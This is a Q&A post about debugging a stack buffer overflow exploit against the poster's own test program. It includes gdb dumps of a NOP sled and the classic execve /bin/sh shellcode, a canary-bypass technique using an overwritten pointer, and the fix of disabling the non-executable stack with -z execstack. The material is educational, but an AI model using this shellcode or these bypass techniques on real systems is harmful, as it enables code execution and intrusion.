# Buffer overflow : EIP and jump correctly set but segfault

Tags: c, assembly, gdb, buffer-overflow, eip

I am performing a buffer overflow, by avoiding the canary through a memcpy to a pointer, as explained [here](http://www.phrack.org/issues/67/13.html) . In short, you overwrite the address a pointer points to, with the address of the RET in the stack. So memcpy-ing to that pointer, effectively overwrites RET.

Using gdb, I inject my NOP-sled + shellcode + address_overwrite just fine. I can see that RET, at 0xbffff52c, contains a desired address, 0xbffff4c0, that will land in the NOP sled.

`(gdb) x /32xw $esp
0xbffff470:     0xbffff52c      0x0804a008      0x00000004      0x00000000
0xbffff480:     0x000003f3      0x08048327      0x90909087      0x90909090
0xbffff490:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff4a0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff4b0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff4c0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff4d0:     0x90909090      0x90909090      0x90909090      0xeb909090
0xbffff4e0:     0x76895e1f      0x88c03108      0x46890746      0x890bb00c
(gdb) 
0xbffff4f0:     0x084e8df3      0xcd0c568d      0x89db3180      0x80cd40d8
0xbffff500:     0xffffdce8      0x69622fff      0x68732f6e      0xbffff52c
0xbffff510:     0xbffff5a8      0xb7ff5990      0x0000008f      0xbffff5a8
0xbffff520:     0xb7fd1ff4      0x0804a008      0xbffff5a8      0xbffff4c0
0xbffff530:     0x0804a008      0x0804a008      0x0000008f      0x00000001
0xbffff540:     0x00000801      0x00000000      0xbfff0000      0x002001ac
0xbffff550:     0x000081a4      0x00000001      0x000004ad      0x000004ad
0xbffff560:     0x00000000      0x00000000      0xb7fd0000      0x0000008f`

However , running this I get the error bellow, even though dissasembly shows I landed good.

```
Program received signal SIGSEGV, Segmentation fault.
0xbffff4c0 in ?? ()
(gdb) disas 0xbffff4c0, + 10
Dump of assembler code from 0xbffff4c0 to 0xbffff4ca:
=> 0xbffff4c0:  nop
   0xbffff4c1:  nop
   0xbffff4c2:  nop
   0xbffff4c3:  nop
   0xbffff4c4:  nop
   0xbffff4c5:  nop
   0xbffff4c6:  nop
   0xbffff4c7:  nop
   0xbffff4c8:  nop
   0xbffff4c9:  nop
```

Further below is the shellcode.

```
    0xbffff4df:  jmp    0xbffff500
   0xbffff4e1:  pop    %esi
   0xbffff4e2:  mov    %esi,0x8(%esi)
   0xbffff4e5:  xor    %eax,%eax
   0xbffff4e7:  mov    %al,0x7(%esi)
   0xbffff4ea:  mov    %eax,0xc(%esi)
   0xbffff4ed:  mov    $0xb,%al
   0xbffff4ef:  mov    %esi,%ebx
```

... etc.

I used the shellcode from [Smashing the stack](http://insecure.org/stf/smashstack.html) , Appendix B, for the linux system. Can you help me understand what's wrong?

Comment: Did you disable NX protection? By default stack is not executable.

Answer (score 4, accepted):

You didn't say what OS you are on, or how you built your target program.

Assuming Linux and no `-Wl,-z,execstack`, modern Linux distributions default to `-Wl,-z,noexecstack`, which (surprise!) makes stack non-executable.

You can read about some of the protection mechanisms [here](https://www.win.tue.nl/~aeb/linux/hh/protection.html).

Comment: I'm such an idiot! Completely missed the non executable stack obstacle.
Compiling with the -z execstack option did the trick.
Thanks a bunch.